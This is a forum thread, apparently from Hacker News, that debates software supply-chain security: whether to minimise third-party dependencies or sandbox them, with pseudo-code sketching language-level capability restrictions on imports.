This is why I don't think this is an OS problem. I think it's a developer mindset problem.
Dependencies are bad.
Every single dependency in your code is a liability, a security loophole, a potential legal risk, and a time sink.
Every dependency needs to be audited and evaluated, and all the changes on every update reviewed. Otherwise who knows what got injected into your code?
Evaluating each dependency for potential risk is important. How much coding time is this saving? Would it, in fact, be quicker to just write that code yourself? Can you vendor it and cut out features you don't need? How many other people use this? Is it supported by its original maintainer? Does it have a deep-pocketed maintainer that could be an alternative target for legal claims?
Mostly, people don't do that and just "import antigravity" without wondering if there's a free lunch in there...
I strongly disagree that this isn't an OS problem.
s/dependency/application/g in your comment. Dependencies are just applications that are controlled through code rather than via a mouse/keyboard. They're not special.
I run a minimal Arch setup at home for my development machine, partially for security/reliability reasons -- less software means fewer chances for something to go wrong. But this is a band-aide fix. A minimal Arch setup that forgoes modern niceties like a graphical file browser is not a general-purpose solution to software security.
When someone comes to me and says that an app is stealing their iOS contacts behind their back, my response isn't, "well, its your own fault for installing apps in the first place. Apps are bad." My response is to say that iOS apps shouldn't have access to contacts without explicit permission.
The same is true of language dependencies. Both users and developers need the ability to run untrusted code. The emphasis on "try your hardest not to install anything" is (very temporarily) good advice, but it's ultimately counterproductive and harmful if it distracts us from solving the root issues.
But until we can provide a form of static analysis that can tell you whether a dependency is malicious or not, we're stuck either manually auditing them, or not using them.
There's very little to choose between a user coming to you saying "I ran a bad application" and "I ran a bad application and clicked on the allow button because I had no way of knowing it was a bad application and I have to allow all applications". Users are notorious for defeating access permissions. Implementing this same bad solution on developers isn't going to work.
At the risk of sounding like someone who wants to spark a language fight (which I genuinely don't) this is why I love Go. The standard library is so good that I rarely need to bring in any third-party dependencies, and the few I do use are extremely well-known with many eyes on their code.
That sounds like a boil the ocean solution. We're never going to get all developers to be perfect, and besides there are evil devs as well so the solution has to be elsewhere.
The solution most people seem to be talking about is sandboxing imports off into containers (sandboxes, whatever - these will end up as containers) so that they can have their access to sensitive data and API's controlled. These aren't "code dependencies" any more, these are "runtime services". It implicitly conforms to "dependencies are bad" by forcing all dependencies to be external services. But it doesn't allow you to actually import known-good dependencies from trusted sources.
And specifically granting access permissions to code has always worked before, right? I mean, people never just click "allow" all the time so they're not bothered by security dialogs, do they? Why are we talking about implementing such a proven-bad solution yet again?
> And specifically granting access permissions to code has always worked before, right? I mean, people never just click "allow" all the time so they're not bothered by security dialogs, do they? Why are we talking about implementing such a proven-bad solution yet again?
To be clear, is your argument that it's too hard for us to teach people to avoid granting unnecessary permissions, but not too hard for us to teach users not to install any software in the first place?
Educating users about permissions is hard, convincing users not to download anything is impossible.
My argument is that user behaviour proves that this solution isn't actually a solution. It shifts the blame, but it doesn't solve the problem.
Developers will just allow the bad code access to the things it says it needs, because it says it needs them. Meanwhile we have another sandbox layer to deal with, which isn't good.
We need to reduce the proliferation of dependencies, and only use them for important things, to reduce the attack surface. And we need to tighten up the package managers so typosquatting and duplication of interfaces is flagged (if not banned), and we need some kind of static analysis that flags what capabilities a library uses. And I'm sure there's lots more ways of solving it that I can't think of here.
> We need to reduce the proliferation of dependencies, and only use them for important things
What you're proposing here is infinitely harder than teaching users to be responsible with permissions. If you can't teach a developer not to grant code access to everything it asks for, you are not going to be able to teach them to install fewer dependencies. It just won't happen, it's completely unrealistic.
A lot of the solutions you're proposing have significant downsides, or they don't scale. Static analysis is great, but doesn't work in highly dynamic languages like Python, Javascript, and Lisp. It also can't handle ambiguously malicious behavior, like device fingerprinting. Static analysis is just a worse version of sandboxing with more holes and more guesswork. Manual reviews don't scale at all -- they're even more unrealistic of a solution than trusting developers to be frugal about the code they install. Tightening package names is nice, but again, not a silver bullet. Sometimes official libraries with official names go bad as well. We have a lot of solutions like this that we can observe in the wild, and they don't really work very well. Google Play still has malware, even though Google says they review apps and remove fraudulent submissions.
On the other hand, we actually have pretty good evidence that sandboxing at least helps -- namely, iOS and the web. Sandboxing isn't perfect, it's a very complicated UX/UI problem that I consider still somewhat unsolved. But, iOS is making decent progress here. Their recent permission reminder system periodically asks users if they want to continue granting permissions to an app -- that's really smart design. The web has also been making excellent progress for a long time. The web has a lot of flaws, but it is a gold standard for user-accessible sandboxing. Nobody thinks twice about clicking on a random link in Twitter, because they don't have to. There's obviously still a lot that needs to improve, but if the primary concern we had about malicious packages on PyPi was that they might mine bitcoin in the background, that would be a very large improvement over stealing SSH keys.
The reason sandboxing is so good is specifically because it shifts blame. Shifting blame is great. With the current situation, I need to audit the code and do research for every single app I install on my PC -- I have to decide whether the author is trustworthy. If the author isn't trustworthy, there's nothing I can do other than avoid their app entirely. This is complicated because trust isn't binary. So I can't just separate authors into "good" and "bad" categories, I have to grade them on a curve.
I do this. It's exhausting. A system where I manage permissions instead of granting each codebase a binary "trusted" label would be a massive improvement to my life, and it's crazy to me that people are in effect saying that we should keep dependencies terrible and exhausting for everyone just because the solution won't help users who are already going to ignore safeguards and install malware anyway.
Imagine if when multiuser systems were first proposed for Unix, somebody said, "yeah, but everyone's just going to grant sudo willy-nilly or share passwords, so why even separate accounts? Instead, we should encourage network admins to minimize the number of people with access to a remote system to just one or two." The current NodeJS sandboxing proposals would mean that when I import a library, I can globally restrict its permissions and its dependencies' permissions in something like 3 lines of code -- the whole thing is completely under my control. The alternative is I spend hours trying to figure out if it's safe to import. How is that better?
Because a dependency isn't a service. You're talking about dependencies as if they're standalone services that you consume. I think that's probably the predominant attitude at the moment, so sandboxing dependencies to turn them into (effectively) standalone services that you consume might work.
But I don't use dependencies like that. I'm mostly just importing useful functions from a library. Having to sandbox that function away from the rest of my code is not going to work. I'll end up copy/pasting the code into my project to avoid that.
When we talk about sandboxing dependencies, we're talking about sandboxing at an API level, not an OS level -- in some languages (particularly memory-unsafe languages) that's difficult, but in general the intention isn't to put dependencies in a separate process; it's to restrict access to dangerous APIs like network requests.
Sandboxing might be something like, "I'm importing a function, and I'm going to define a scope, and within that scope, it will have access to these methods, and nothing else." Imagine the following pseudo-code in a fictional, statically typed, rigid langauge.
import std from 'std';
import disk from 'io';
import request from 'http';
//This dependency (and its sub-dependencies) can
//only call methods in the std library, nothing else.
//I can call special_sort anywhere I want and I *know*
//it can't make network requests or access the disk.
//All it can do is call a few core std libraries.
import (std){ special_sort } from 'shady_special_sort';
function save (data) {
disk.write('output.log', data);
}
function safe_save (data) {
if (!valid(data)) { return false; }
save(data);
}
function main () {
//An on-the-fly sandbox -- access to safe_save and request.
(request, safe_save){
save('my_malware_payload'); //compile-time error
disk.write('output.log', 'my_malware_payload'); //compile-time error
safe_save('my_malware_payload'); //allowed
}
}
We're not treating our dependencies or even our inline code as a service here -- we're not loading the code into a separate process or forcing ourselves to go through a connector to call into the API. We're just defining a static constraint that will stop our program from compiling if the code tries to do something we don't want, it's no different than a type-check.
The difference between this and pure static analysis is that static analysis isn't something that's built into the language, and static analysis tries to guess intent. Static analysis says, "that looks shifty, let's alert someone." An language-level sandbox says, "I don't care about the intent, you have access to X and that's it."
Even in a dynamic language like JS, when people talk about stuff like the Realms proposal[0][1], they're talking about a system that's a lot closer to the above than they are about creating standalone services that would live in their own processes or threads.
This kind of style of thinking about security lends itself particularly well to functional languages and functional coding styles, but there's no reason it can't also work with more traditional class-based approaches as well -- you just have to be more careful about what you're passing around and what has access to what objects.
class Dangerous () {
unsafe_write (data) {
//unvalidated disk access
}
}
class Safe () {
public Dangerous ref = new Dangerous();
safe_write (data) {
validate(data);
ref.unsafe_write();
}
}
function main () {
Dangerous instance = new Dangerous();
(instance){
//I've just accidentally given my sandbox
//access to `unsafe_write` because I left
//a property public.
}
}
Even with that concern, worrying about my own references is still way, way easier than worrying about an entire, separate codebase that I can't control.
Ideally, though, we wouldn't have to all reimplement the wheel the n+1th time every time. The great power of software is that something can be written once and used over and over again, unlike the way each building needs to be built from the ground, each dinner has to be cooked from the ingredients every day etc.
To give up this kind of modularity and relying on other software engineers' work would throw the baby out with the bathwater.
Sure you need to apply judgement about whether a library seems legit, but the other end of the spectrum is the not-invented-here attitude, which is also bad.
The other question to ask yourself is if you want the dependency as a visible external thing, or do you want it cut & pasted into your code?
Just saying that "Dependencies are bad" means people are more likely to cut and paste that algorithm or bit of code into your application rather than taking it from some sort of package. In this sense you also do not know that it is a dependency, and you do not get any updates or bug fixes for it either.
Have to be careful about those unintended consequences there.
I agree with you, we need developers that take resposibility for their publications, review and test their codebase and all it’s dependencies, proper identification of ”real” published code (integrity check) and also the opt-in to place trust in different maintainers.
Dependencies are bad.
Every single dependency in your code is a liability, a security loophole, a potential legal risk, and a time sink.
Every dependency needs to be audited and evaluated, and all the changes on every update reviewed. Otherwise who knows what got injected into your code?
Evaluating each dependency for potential risk is important. How much coding time is this saving? Would it, in fact, be quicker to just write that code yourself? Can you vendor it and cut out features you don't need? How many other people use this? Is it supported by its original maintainer? Does it have a deep-pocketed maintainer that could be an alternative target for legal claims?
Mostly, people don't do that and just "import antigravity" without wondering if there's a free lunch in there...